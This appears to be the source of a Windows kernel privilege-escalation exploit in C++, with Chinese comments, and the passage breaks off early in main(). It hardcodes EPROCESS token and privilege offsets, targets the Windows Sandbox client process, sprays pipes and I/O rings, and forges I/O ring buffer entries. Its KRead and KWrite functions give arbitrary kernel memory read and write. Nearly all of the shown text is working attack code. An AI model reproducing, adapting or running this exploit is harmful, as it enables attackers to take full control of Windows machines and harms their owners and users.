1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
647
648
649
650
651
652
653
654
655
656
657
658
659
660
661
662
663
664
665
666
667
668
669
670
671
672
673
674
675
676
677
678
679
680
681
682
683
684
685
686
687
688
689
690
691
692
693
694
695
696
697
698
699
700
701
702
703
704
705
706
707
708
709
710
711
712
713
714
715
716
717
718
719
720
721
722
723
724
725
726
727
728
729
730
731
732
733
734
735
736
737
738
739
740
741
742
743
744
745
746
747
748
749
750
751
752
753
754
755
756
757
758
759
760
761
762
763
764
765
766
767
768
769
770
771
772
773
774
775
776
777
778
779
780
781
782
783
784
785
786
787
788
789
790
791
792
793
794
795
796
797
798
799
800
801
802
803
804
805
806
807
808
809
810
811
812
813
814
815
816
817
818
819
820
821
822
823
824
825
826
827
828
829
830
831
832
833
834
835
836
837
838
839
840
841
842
843
844
845
846
847
848
849
850
851
852
853
854
855
856
857
858
859
860
861
862
863
864
865
866
867
868
869
870
871
872
873
874
875
876
|
#include <iostream>
#include <Windows.h>
#include <combaseapi.h>
#include <iostream>
#include <sstream>
#include "Hexdump.hpp"
#include <ioringapi.h>
#include <tlhelp32.h>
#include <DbgEng.h>
#include <aclapi.h>
#include "wnf.h"
#include <vector>
#include <algorithm>
#include <tuple>
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
#pragma comment(lib, "Ole32.lib")
#pragma comment(lib, "Rpcrt4.lib")
#define STATENAMES1_SIZE 0x2000
#define IORINGS_SIZE 0x500
#define SPRAY_PIPE_COUNT 0x500
#define STATENAMES2_SIZE 0x2000
#define STATENAMES3_SIZE 0x800
#define EPROCESS_UNIQUEPROCESSID_OFFSET 0x440
#define EPROCESS_FLINK_OFFSET 0x448
#define EPROCESS_TOKEN_OFFSET 0x4b8
#define SEP_TOKEN_PRIVILEGES_OFFSET 0x40
#define INTEGRITYLEVELINDEX_OFFSET 0xd0
#define NPFS_NPFSDCREATE_OFFSET 0xcfc0
#define NPFS_GOT_ALLOCATEPOOL2_OFFSET 0x7050
#define NT_ALLOCATEPOOL2_OFFSET 0xaaa3b0
#define NT_INITIALSYSTEMPROCESS_OFFSET 0xd1ea60
#define ROOT_PIPE_ATTRIBUTE_OFFSET 0x140
#define FILE_OBJECT_OFFSET 0x30
#define OBJECT_HEADER_SIZE 0x30
#define TARGET_SIZE 0x50
#define REGBUFFERCOUNT (TARGET_SIZE-0x10)/sizeof(PVOID)
#define OBJECT_HEADER_NAMEINFO_SIZE 0x20
#define REGBUFFERS_TAG 0x42527249
#define PIPEATTRIBUTE_TAG 0x7441704e
#define OUTPUT_PIPE_NAME L"\\\\.\\pipe\\IoRingExploitOutput"
#define INPUT_PIPE_NAME L"\\\\.\\pipe\\IoRingExploitInput"
#define WNF_MAX_DATA_SIZE 0x1000
#define ROUND_DOWN(n, align) (((ULONG)n) & ~((align) - 1l))
#define ROUND_UP(n, align) ROUND_DOWN(((ULONG)n) + (align) - 1, (align))
#define InitializeObjectAttributes( p, n, a, r, s ) { \
(p)->Length = sizeof( OBJECT_ATTRIBUTES ); \
(p)->RootDirectory = r; \
(p)->Attributes = a; \
(p)->ObjectName = n; \
(p)->SecurityDescriptor = s; \
(p)->SecurityQualityOfService = NULL; \
}
/* 在Gary Nebbett的《Windows NT/2000 Native API Reference》中有文档记录 */
typedef struct _SYSTEM_PERFORMANCE_INFORMATION {
LARGE_INTEGER IdleTime;
LARGE_INTEGER ReadTransferCount;
LARGE_INTEGER WriteTransferCount;
LARGE_INTEGER OtherTransferCount;
ULONG ReadOperationCount;
ULONG WriteOperationCount;
ULONG OtherOperationCount;
ULONG AvailablePages;
ULONG TotalCommittedPages;
ULONG TotalCommitLimit;
ULONG PeakCommitment;
ULONG PageFaults;
ULONG WriteCopyFaults;
ULONG TransitionFaults;
ULONG Reserved1;
ULONG DemandZeroFaults;
ULONG PagesRead;
ULONG PageReadIos;
ULONG Reserved2[2];
ULONG PagefilePagesWritten;
ULONG PagefilePageWriteIos;
ULONG MappedFilePagesWritten;
ULONG MappedFilePageWriteIos;
ULONG PagedPoolUsage;
ULONG NonPagedPoolUsage;
ULONG PagedPoolAllocs;
ULONG PagedPoolFrees;
ULONG NonPagedPoolAllocs;
ULONG NonPagedPoolFrees;
ULONG TotalFreeSystemPtes;
ULONG SystemCodePage;
ULONG TotalSystemDriverPages;
ULONG TotalSystemCodePages;
ULONG SmallNonPagedLookasideListAllocateHits;
ULONG SmallPagedLookasideListAllocateHits;
ULONG Reserved3;
ULONG MmSystemCachePage;
ULONG PagedPoolPage;
ULONG SystemDriverPage;
ULONG FastReadNoWait;
ULONG FastReadWait;
ULONG FastReadResourceMiss;
ULONG FastReadNotPossible;
ULONG FastMdlReadNoWait;
ULONG FastMdlReadWait;
ULONG FastMdlReadResourceMiss;
ULONG FastMdlReadNotPossible;
ULONG MapDataNoWait;
ULONG MapDataWait;
ULONG MapDataNoWaitMiss;
ULONG MapDataWaitMiss;
ULONG PinMappedDataCount;
ULONG PinReadNoWait;
ULONG PinReadWait;
ULONG PinReadNoWaitMiss;
ULONG PinReadWaitMiss;
ULONG CopyReadNoWait;
ULONG CopyReadWait;
ULONG CopyReadNoWaitMiss;
ULONG CopyReadWaitMiss;
ULONG MdlReadNoWait;
ULONG MdlReadWait;
ULONG MdlReadNoWaitMiss;
ULONG MdlReadWaitMiss;
ULONG ReadAheadIos;
ULONG LazyWriteIos;
ULONG LazyWritePages;
ULONG DataFlushes;
ULONG DataPages;
ULONG ContextSwitches;
ULONG FirstLevelTbFills;
ULONG SecondLevelTbFills;
ULONG SystemCalls;
} SYSTEM_PERFORMANCE_INFORMATION, * PSYSTEM_PERFORMANCE_INFORMATION;
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemBasicInformation = 0,
SystemPerformanceInformation = 2,
} SYSTEM_INFORMATION_CLASS;
typedef NTSTATUS(WINAPI* NtQuerySystemInformation_t)(
SYSTEM_INFORMATION_CLASS SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength
);
typedef enum _PROCESSINFOCLASS {
ProcessBasicInformation = 0,
ProcessQuotaLimits = 1,
ProcessIoCounters = 2,
ProcessVmCounters = 3,
ProcessTimes = 4,
ProcessBasePriority = 5,
ProcessRaisePriority = 6,
ProcessDebugPort = 7,
ProcessExceptionPort = 8,
ProcessAccessToken = 9,
ProcessLdtInformation = 10,
ProcessLdtSize = 11,
ProcessDefaultHardErrorMode = 12,
ProcessIoPortHandlers = 13,
ProcessPooledUsageAndLimits = 14,
ProcessWorkingSetWatch = 15,
ProcessUserModeIOPL = 16,
ProcessEnableAlignmentFaultFixup = 17,
ProcessPriorityClass = 18,
ProcessWx86Information = 19,
ProcessHandleCount = 20,
ProcessAffinityMask = 21,
ProcessPriorityBoost = 22,
ProcessDeviceMap = 23,
ProcessSessionInformation = 24,
ProcessForegroundInformation = 25,
ProcessWow64Information = 26,
ProcessImageFileName = 27,
ProcessLUIDDeviceMapsEnabled = 28,
ProcessBreakOnTermination = 29,
ProcessDebugObjectHandle = 30,
ProcessDebugFlags = 31,
ProcessHandleTracing = 32,
ProcessIoPriority = 33,
ProcessExecuteFlags = 34,
ProcessTlsInformation = 35,
ProcessCookie = 36,
ProcessImageInformation = 37,
ProcessCycleTime = 38,
ProcessPagePriority = 39,
ProcessInstrumentationCallback = 40,
ProcessThreadStackAllocation = 41,
ProcessWorkingSetWatchEx = 42,
ProcessImageFileNameWin32 = 43,
ProcessImageFileMapping = 44,
ProcessAffinityUpdateMode = 45,
ProcessMemoryAllocationMode = 46,
ProcessGroupInformation = 47,
ProcessTokenVirtualizationEnabled = 48,
ProcessConsoleHostProcess = 49,
ProcessWindowInformation = 50,
ProcessHandleInformation = 51,
ProcessMitigationPolicy = 52,
ProcessDynamicFunctionTableInformation = 53,
ProcessHandleCheckingMode = 54,
ProcessKeepAliveCount = 55,
ProcessRevokeFileHandles = 56,
ProcessWorkingSetControl = 57,
ProcessHandleTable = 58,
ProcessCheckStackExtentsMode = 59,
ProcessCommandLineInformation = 60,
ProcessProtectionInformation = 61,
ProcessMemoryExhaustion = 62,
ProcessFaultInformation = 63,
ProcessTelemetryIdInformation = 64,
ProcessCommitReleaseInformation = 65,
ProcessDefaultCpuSetsInformation = 66,
ProcessAllowedCpuSetsInformation = 67,
ProcessSubsystemProcess = 68,
ProcessJobMemoryInformation = 69,
ProcessInPrivate = 70,
ProcessRaiseUMExceptionOnInvalidHandleClose = 71,
ProcessIumChallengeResponse = 72,
ProcessChildProcessInformation = 73,
ProcessHighGraphicsPriorityInformation = 74,
ProcessSubsystemInformation = 75,
ProcessEnergyValues = 76,
ProcessPowerThrottlingState = 77,
ProcessReserved3Information = 78,
ProcessWin32kSyscallFilterInformation = 79,
ProcessDisableSystemAllowedCpuSets = 80,
ProcessWakeInformation = 81,
ProcessEnergyTrackingState = 82,
ProcessManageWritesToExecutableMemory = 83,
ProcessCaptureTrustletLiveDump = 84,
ProcessTelemetryCoverage = 85,
ProcessEnclaveInformation = 86,
ProcessEnableReadWriteVmLogging = 87,
ProcessUptimeInformation = 88,
ProcessImageSection = 89,
ProcessDebugAuthInformation = 90,
ProcessSystemResourceManagement = 91,
ProcessSequenceNumber = 92,
ProcessLoaderDetour = 93,
ProcessSecurityDomainInformation = 94,
ProcessCombineSecurityDomainsInformation = 95,
ProcessEnableLogging = 96,
ProcessLeapSecondInformation = 97,
ProcessFiberShadowStackAllocation = 98,
ProcessFreeFiberShadowStackAllocation = 99,
ProcessAltSystemCallInformation = 100,
ProcessDynamicEHContinuationTargets = 101,
ProcessDynamicEnforcedCetCompatibleRanges = 102,
ProcessCreateStateChange = 103,
ProcessApplyStateChange = 104,
ProcessEnableOptionalXStateFeatures = 105,
ProcessAltPrefetchParam = 106,
ProcessAssignCpuPartitions = 107,
ProcessPriorityClassEx = 108,
ProcessMembershipInformation = 109,
} PROCESSINFOCLASS;
typedef struct _SEP_TOKEN_PRIVILEGES
{
ULONGLONG Present; //0x0
ULONGLONG Enabled; //0x8
ULONGLONG EnabledByDefault; //0x10
}SEP_TOKEN_PRIVILEGES, * PSEP_TOKEN_PRIVILEGES;
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
} UNICODE_STRING, * PUNICODE_STRING;
#define SystemHandleInformation 0x10
#define SystemHandleInformationSize 1024 * 1024 * 2
using fNtQuerySystemInformation = NTSTATUS(WINAPI*)(
ULONG SystemInformationClass,
PVOID SystemInformation,
ULONG SystemInformationLength,
PULONG ReturnLength
);
using myNtFsControlFile = NTSTATUS(WINAPI*)(
IN HANDLE FileHandle,
IN HANDLE Event OPTIONAL,
IN PVOID ApcRoutine OPTIONAL,
IN PVOID ApcContext OPTIONAL,
OUT PVOID IoStatusBlock,
IN ULONG FsControlCode,
IN PVOID InputBuffer OPTIONAL,
IN ULONG InputBufferLength,
OUT PVOID OutputBuffer OPTIONAL,
IN ULONG OutputBufferLength);
// 句柄信息
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO
{
USHORT UniqueProcessId;
USHORT CreatorBackTraceIndex;
UCHAR ObjectTypeIndex;
UCHAR HandleAttributes;
USHORT HandleValue;
PVOID Object;
ULONG GrantedAccess;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO;
// 句柄表信息
typedef struct _SYSTEM_HANDLE_INFORMATION
{
ULONG NumberOfHandles;
SYSTEM_HANDLE_TABLE_ENTRY_INFO Handles[1];
} SYSTEM_HANDLE_INFORMATION, * PSYSTEM_HANDLE_INFORMATION;
typedef struct _OBJECT_ATTRIBUTES {
ULONG Length;
HANDLE RootDirectory;
PUNICODE_STRING ObjectName;
ULONG Attributes;
PSECURITY_DESCRIPTOR SecurityDescriptor;
PVOID SecurityQualityOfService;
} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
typedef struct _RTL_USER_PROCESS_PARAMETERS {
BYTE Reserved1[16];
PVOID Reserved2[10];
UNICODE_STRING ImagePathName;
UNICODE_STRING CommandLine;
} RTL_USER_PROCESS_PARAMETERS, * PRTL_USER_PROCESS_PARAMETERS;
typedef struct _PEB {
BYTE Reserved1[2];
BYTE BeingDebugged;
BYTE Reserved2[1];
PVOID Reserved3[2];
PVOID Ldr;
PRTL_USER_PROCESS_PARAMETERS ProcessParameters;
PVOID Reserved4[3];
PVOID AtlThunkSListPtr;
PVOID Reserved5;
ULONG Reserved6;
PVOID Reserved7;
ULONG Reserved8;
ULONG AtlThunkSListPtr32;
PVOID Reserved9[45];
BYTE Reserved10[96];
PVOID PostProcessInitRoutine;
BYTE Reserved11[128];
PVOID Reserved12[1];
ULONG SessionId;
} PEB, * PPEB;
typedef LONG KPRIORITY;
typedef struct _POOL_HEADER
{
union
{
struct
{
USHORT PreviousSize : 8; //0x0
USHORT PoolIndex : 8; //0x0
USHORT BlockSize : 8; //0x2
USHORT PoolType : 8; //0x2
};
ULONG Ulong1; //0x0
};
ULONG PoolTag; //0x4
union
{
PVOID ProcessBilled; //0x8
struct
{
USHORT AllocatorBackTraceIndex; //0x8
USHORT PoolTagHash; //0xa
};
};
}POOL_HEADER, * PPOOL_HEADER;
//0x8字节(sizeof)
struct _NT_IORING_CREATE_FLAGS
{
enum _NT_IORING_CREATE_REQUIRED_FLAGS Required; //0x0
enum _NT_IORING_CREATE_ADVISORY_FLAGS Advisory; //0x4
};
//0x30字节(sizeof)
typedef struct _NT_IORING_INFO
{
enum IORING_VERSION IoRingVersion; //0x0
struct _NT_IORING_CREATE_FLAGS Flags; //0x4
ULONG SubmissionQueueSize; //0xc
ULONG SubmissionQueueRingMask; //0x10
ULONG CompletionQueueSize; //0x14
ULONG CompletionQueueRingMask; //0x18
PVOID SubmissionQueue; //0x20
PVOID CompletionQueue; //0x28
}NT_IORING_INFO, * PNT_IORING_INFO;
typedef struct _KEVENT {
unsigned char Header[0x18];
} KEVENT, * PKEVENT, * PRKEVENT;
//0x80字节(sizeof)
typedef struct _IOP_MC_BUFFER_ENTRY
{
USHORT Type; //0x0
USHORT Reserved; //0x2
ULONG Size; //0x4
LONG ReferenceCount; //0x8
enum _IOP_MC_BUFFER_ENTRY_FLAGS Flags; //0xc
struct _LIST_ENTRY GlobalDataLink; //0x10
PVOID Address; //0x20
ULONG Length; //0x28
CHAR AccessMode; //0x2c
LONG MdlRef; //0x30
PVOID Mdl; //0x38
struct _KEVENT MdlRundownEvent; //0x40
ULONGLONG* PfnArray; //0x58
BYTE dummy[0x20]; //0x60
}IOP_MC_BUFFER_ENTRY, * PIOP_MC_BUFFER_ENTRY;
typedef struct _UIORING
{
HANDLE handle;
NT_IORING_INFO Info;
UINT32 IoRingKernelAcceptedVersion;
PVOID RegBufferArray; // 指向I/O环操作数组的指针
UINT32 BufferArraySize; // 操作指针数组的大小
PVOID Unknown;
UINT32 FileHandlesCount;
UINT32 SubQueueHead;
UINT32 SubQueueTail;
}UIORING, * PUIORING;
typedef struct _PROCESS_BASIC_INFORMATION {
NTSTATUS ExitStatus;
PPEB PebBaseAddress;
ULONG_PTR AffinityMask;
KPRIORITY BasePriority;
ULONG_PTR UniqueProcessId;
ULONG_PTR InheritedFromUniqueProcessId;
} PROCESS_BASIC_INFORMATION;
using NtCreateCrossVmEvent = NTSTATUS(NTAPI*)(PHANDLE EventHandle,
IN ACCESS_MASK DesiredAccess,
IN POBJECT_ATTRIBUTES ObjectAttributes,
ULONG Unknown1,
PVOID Unknown2,
IN GUID* Guid
);
using NtQueryInformationProcess = NTSTATUS(WINAPI*)(
HANDLE ProcessHandle,
PROCESSINFOCLASS ProcessInformationClass,
PVOID ProcessInformation,
ULONG ProcessInformationLength,
PULONG ReturnLength
);
HANDLE GetWinSBXCliProcHandle() {
HANDLE hProcess = NULL;
PROCESSENTRY32 pe32;
pe32.dwSize = sizeof(PROCESSENTRY32);
HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSnapshot == INVALID_HANDLE_VALUE) {
return NULL;
}
if (!Process32First(hSnapshot, &pe32)) {
CloseHandle(hSnapshot);
return NULL;
}
do {
if (wcscmp(pe32.szExeFile, L"WindowsSandboxClient.exe") == 0) {
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE,
pe32.th32ProcessID);
break;
}
} while (Process32Next(hSnapshot, &pe32));
CloseHandle(hSnapshot);
return hProcess;
}
using myNtUpdateWnfStateData =
NTSTATUS(
NTAPI*)
(
_In_ PCWNF_STATE_NAME StateName,
_In_reads_bytes_opt_(Length) const VOID* Buffer,
_In_opt_ ULONG Length,
_In_opt_ PCWNF_TYPE_ID TypeId,
_In_opt_ const VOID* ExplicitScope,
_In_ WNF_CHANGE_STAMP MatchingChangeStamp,
_In_ LOGICAL CheckStamp
);
using myNtCreateWnfStateName =
NTSTATUS(
NTAPI*)
(
_Out_ PWNF_STATE_NAME StateName,
_In_ WNF_STATE_NAME_LIFETIME NameLifetime,
_In_ WNF_DATA_SCOPE DataScope,
_In_ BOOLEAN PersistData,
_In_opt_ PCWNF_TYPE_ID TypeId,
_In_ ULONG MaximumStateSize,
_In_ PSECURITY_DESCRIPTOR SecurityDescriptor
);
using myNtDeleteWnfStateName =
NTSTATUS(
NTAPI*)
(
_Out_ PWNF_STATE_NAME StateName
);
using myNtQueryWnfStateData =
NTSTATUS(
NTAPI*)(
_In_ PCWNF_STATE_NAME StateName,
_In_opt_ PCWNF_TYPE_ID TypeId,
_In_opt_ const VOID* ExplicitScope,
_Out_ PWNF_CHANGE_STAMP ChangeStamp,
_Out_writes_bytes_to_opt_(*BufferSize, *BufferSize) PVOID Buffer,
_Inout_ PULONG BufferSize
);
using myNtDeleteWnfStateData =
NTSTATUS(
NTAPI*)
(
_In_ PCWNF_STATE_NAME StateName,
_In_opt_ const VOID* ExplicitScope
);
typedef struct _WNF_STATE_CORRUPTED {
WNF_STATE_NAME state;
unsigned long long val;
ULONG dataSize;
} WNF_STATE_CORRUPTED, * PWNF_STATE_CORRUPTED;
typedef struct _TEMP_ARRAY_ELEMENT {
PISID Sid;
ULONG SidLength;
} TEMP_ARRAY_ELEMENT;
typedef struct _SPRAY_PIPE {
HANDLE pipe_read;
HANDLE pipe_write;
}SPRAY_PIPE, * PSPRAY_PIPE;
PUIORING puioring = NULL;
PVOID ioringaddress = NULL;
HIORING targetHandle = NULL;
IOP_MC_BUFFER_ENTRY* fake_bufferentry = NULL;
UINT_PTR userData = 0x41414141;
ULONG numberOfFakeBuffers = 100;
PVOID addressForFakeBuffers = NULL;
HANDLE inputPipe = INVALID_HANDLE_VALUE;
HANDLE outputPipe = INVALID_HANDLE_VALUE;
HANDLE inputClientPipe = INVALID_HANDLE_VALUE;
HANDLE outputClientPipe = INVALID_HANDLE_VALUE;
IORING_BUFFER_INFO preregBuffers[REGBUFFERCOUNT] = { 0 };
PUIORING* iorings = NULL;
SPRAY_PIPE* spray_pipes = NULL;
SIZE_T attribute_size = TARGET_SIZE - 0x38;
unsigned char* attribute = NULL;
unsigned char* output = NULL;
SIZE_T output_size = 0x100;
BOOL prepare() {
iorings = new PUIORING[IORINGS_SIZE];
HRESULT result;
IORING_CREATE_FLAGS flags;
spray_pipes = new SPRAY_PIPE[SPRAY_PIPE_COUNT];
for (int i = 0; i < SPRAY_PIPE_COUNT; i++) {
if (!CreatePipe(&spray_pipes[i].pipe_read,
&spray_pipes[i].pipe_write, NULL, NULL)) {
std::cout << "CreatePipe failed with error " << GetLastError()
<< " index " << i << std::endl;
}
}
attribute = new unsigned char[0x1000];
memset(attribute, 0x41, 0x1000);
attribute[0] = 'Z';
attribute[1] = '\0';
output = new unsigned char[output_size];
memset(output, 0x0, 0x100);
flags.Required = IORING_CREATE_REQUIRED_FLAGS_NONE;
flags.Advisory = IORING_CREATE_ADVISORY_FLAGS_NONE;
fake_bufferentry =
reinterpret_cast<IOP_MC_BUFFER_ENTRY*>(VirtualAlloc(NULL, 0x5000,
MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE));
VirtualLock(fake_bufferentry, 0x5000);
fake_bufferentry =
reinterpret_cast<IOP_MC_BUFFER_ENTRY*>(reinterpret_cast<unsigned
char*>(fake_bufferentry) + 0x3000);
memset(fake_bufferentry, 0, sizeof(IOP_MC_BUFFER_ENTRY));
//预注册缓冲区数组,长度为REGBUFFERCOUNT
preregBuffers[0].Address = VirtualAlloc(NULL, 0x1000, MEM_RESERVE |
MEM_COMMIT, PAGE_READWRITE);
if (!preregBuffers[0].Address)
{
printf("[-] Failed to allocate prereg buffer\n");
return FALSE;
}
memset(preregBuffers[0].Address, 0x41, 0x100);
preregBuffers[0].Length = 0x10;
for (int i = 0; i < IORINGS_SIZE; i++) {
result = CreateIoRing(IORING_VERSION_3, flags, 0x10000, 0x20000,
reinterpret_cast<HIORING*>(&(iorings[i])));
if (!SUCCEEDED(result))
{
printf("[-] Failed creating IO ring handle: 0x%x\n", result);
}
//printf("[+] Created IoRing. puioring=0x%p\n", iorings[i]);
result =
BuildIoRingRegisterBuffers(reinterpret_cast<HIORING>(iorings[i]),
REGBUFFERCOUNT, preregBuffers, 0);
if (!SUCCEEDED(result))
{
printf("[-] Failed BuildIoRingRegisterBuffers: 0x%x\n", result);
}
}
// 为I/O操作的输入/输出创建命名管道
// 并为它们打开客户端句柄
//
inputPipe = CreateNamedPipe(INPUT_PIPE_NAME, PIPE_ACCESS_DUPLEX,
PIPE_WAIT, 255, 0x1000, 0x1000, 0, NULL);
if (inputPipe == INVALID_HANDLE_VALUE)
{
printf("[-] Failed to create input pipe: 0x%x\n", GetLastError());
return FALSE;
}
outputPipe = CreateNamedPipe(OUTPUT_PIPE_NAME, PIPE_ACCESS_DUPLEX,
PIPE_WAIT, 255, 0x1000, 0x1000, 0, NULL);
if (outputPipe == INVALID_HANDLE_VALUE)
{
printf("[-] Failed to create output pipe: 0x%x\n", GetLastError());
return FALSE;
}
outputClientPipe = CreateFile(OUTPUT_PIPE_NAME,
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL);
if (outputClientPipe == INVALID_HANDLE_VALUE)
{
printf("[-] Failed to open handle to output file: 0x%x\n",
GetLastError());
return FALSE;
}
inputClientPipe = CreateFile(INPUT_PIPE_NAME,
GENERIC_READ | GENERIC_WRITE,
FILE_SHARE_READ | FILE_SHARE_WRITE,
NULL,
OPEN_ALWAYS,
FILE_ATTRIBUTE_NORMAL,
NULL);
if (inputClientPipe == INVALID_HANDLE_VALUE)
{
printf("[-] Failed to open handle to input pipe: 0x%x\n",
GetLastError());
return FALSE;
}
return TRUE;
}
BOOL KWrite(PVOID TargetAddress, PBYTE pValue, SIZE_T size) {
DWORD bytesWritten = 0;
HRESULT result;
UINT32 submittedEntries;
IORING_CQE cqe;
//printf("[*] Writing to %p the following bytes\n", TargetAddress);
//printf("[*] pValue = 0x%p\n", pValue);
//printf("[*] data: ");
//for (int i = 0; i < size; i++) {
// printf("0x%x ", pValue[i]);
//}
//printf("\n");
if (WriteFile(inputPipe, pValue, size, &bytesWritten, NULL) == FALSE)
{
result = GetLastError();
printf("[-] Failed to write into the input pipe: 0x%x\n", result);
return FALSE;
}
//printf("[*] bytesWritten = %d\n", bytesWritten);
//
// 设置另一个缓冲区条目,以ioring->RegBuffers的地址为目标
// 使用输入管道的客户端句柄进行读取操作
//
memset(fake_bufferentry, 0, sizeof(IOP_MC_BUFFER_ENTRY));
fake_bufferentry->Address = TargetAddress;
fake_bufferentry->Length = size;
fake_bufferentry->Type = 0xc02;
fake_bufferentry->Size = 0x80;
fake_bufferentry->AccessMode = 1;
fake_bufferentry->ReferenceCount = 1;
auto requestDataBuffer = IoRingBufferRefFromIndexAndOffset(0, 0);
auto requestDataFile = IoRingHandleRefFromHandle(inputClientPipe);
//printf("[*] performing buildIoRingReadFile\n");
result = BuildIoRingReadFile(targetHandle,
requestDataFile,
requestDataBuffer,
size,
0,
NULL,
IOSQE_FLAGS_NONE);
if (!SUCCEEDED(result))
{
printf("[-] Failed building IO ring read file structure: 0x%x\n",
result);
return FALSE;
}
result = SubmitIoRing(targetHandle, 1, INFINITE, &submittedEntries);
if (!SUCCEEDED(result))
{
printf("[-] Failed submitting IO ring: 0x%x\n", result);
return FALSE;
}
//printf("[*] submittedEntries = %d\n", submittedEntries);
return TRUE;
}
BOOL KRead(PVOID TargetAddress, PBYTE pOut, SIZE_T size) {
DWORD bytesRead = 0;
HRESULT result;
UINT32 submittedEntries;
IORING_CQE cqe;
memset(fake_bufferentry, 0, sizeof(IOP_MC_BUFFER_ENTRY));
fake_bufferentry->Address = TargetAddress;
fake_bufferentry->Length = size;
fake_bufferentry->Type = 0xc02;
fake_bufferentry->Size = 0x80;
fake_bufferentry->AccessMode = 1;
fake_bufferentry->ReferenceCount = 1;
auto requestDataBuffer = IoRingBufferRefFromIndexAndOffset(0, 0);
auto requestDataFile = IoRingHandleRefFromHandle(outputClientPipe);
result = BuildIoRingWriteFile(targetHandle,
requestDataFile,
requestDataBuffer,
size,
0,
FILE_WRITE_FLAGS_NONE,
NULL,
IOSQE_FLAGS_NONE);
if (!SUCCEEDED(result))
{
printf("[-] Failed building IO ring read file structure: 0x%x\n",
result);
return FALSE;
}
result = SubmitIoRing(targetHandle, 1, INFINITE, &submittedEntries);
if (!SUCCEEDED(result))
{
printf("[-] Failed submitting IO ring: 0x%x\n", result);
return FALSE;
}
//printf("[*] submittedEntries = %d\n", submittedEntries);
//
// 检查完成队列以获取操作的实际状态代码
//
result = PopIoRingCompletion(targetHandle, &cqe);
if ((!SUCCEEDED(result)) || (!NT_SUCCESS(cqe.ResultCode)))
{
printf("[-] Failed reading kernel memory 0x%x\n", cqe.ResultCode);
return FALSE;
}
BOOL res = ReadFile(outputPipe,
pOut,
size,
&bytesRead,
NULL);
if (!res)
{
printf("[-] Failed to read from output pipe: 0x%x\n",
GetLastError());
return FALSE;
}
//printf("[+] Successfully read %d bytes from kernel address 0x%p.\n",
bytesRead, TargetAddress);
return res;
}
int main()
{
//printf("creating event\n");
//////getchar();
HANDLE hEvent;
GUID guid, guid2;
ULONG ReturnLength = 0;
LPOLESTR guidstr = (LPOLESTR)new char[0x100];
LPOLESTR guidstr2 = (LPOLESTR)new char[0x100];
STARTUPINFOA si;
unsigned char* status[0x30] = { 0 };
PROCESS_INFORMATION pi;
DWORD64 out = 0;
DWORD64 fileObject = 0;
DWORD64 driverObject = 0;
DWORD64 deviceObject = 0;
POOL_HEADER* ph = NULL;
DWORD64 pNpFsdCreate = 0;
DWORD64* data = NULL;
unsigned char* ptr3 = NULL;
DWORD64 pExAllocatePool2 = 0;
DWORD64 system_eproc = 0;
DWORD64 system_token = 0;
DWORD64 cur_eproc = 0;
HANDLE hWinsbxclientproc;
PROCESS_BASIC_INFORMATION pbi;
long long offset = 0;
PEB peb;
PRTL_USER_PROCESS_PARAMETERS processParams =
reinterpret_cast<PRTL_USER_PROCESS_PARAMETERS>(new char[0x1000]);
ZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
ZeroMemory(&pi, sizeof(pi));
si.cb = sizeof(si);
